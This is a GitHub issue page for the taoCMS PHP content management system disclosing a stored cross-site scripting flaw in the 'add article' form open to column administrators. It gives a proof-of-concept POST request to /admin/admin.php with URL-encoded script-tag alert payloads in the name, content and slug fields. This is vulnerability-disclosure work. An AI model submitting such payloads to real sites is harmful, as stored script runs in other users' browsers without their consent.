taoCMS is an incredible tiny CMS( Content Management System) , writen in PHP and support MySQL/Sqlite as the database(MIT License)
60
stars
21
forks
source link
There is a storage type cross site scripting attack at "Management column"(Column administrator authority) #3
Closed
ddddbhm closed 3 years ago
First, we enter the background and use the column administrator admin1 we created:
Let's click "add article" on the left:
http://target/admin/admin.php?action=frame&ctrl=iframes
Wow!
POC:
/admin/admin.php postData:name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat=0&content=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B&slug=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=&link=&thumbpic=&orders=&status=1&action=cms&ctrl=save&id=&Submit=%E6%8F%90%E4%BA%A4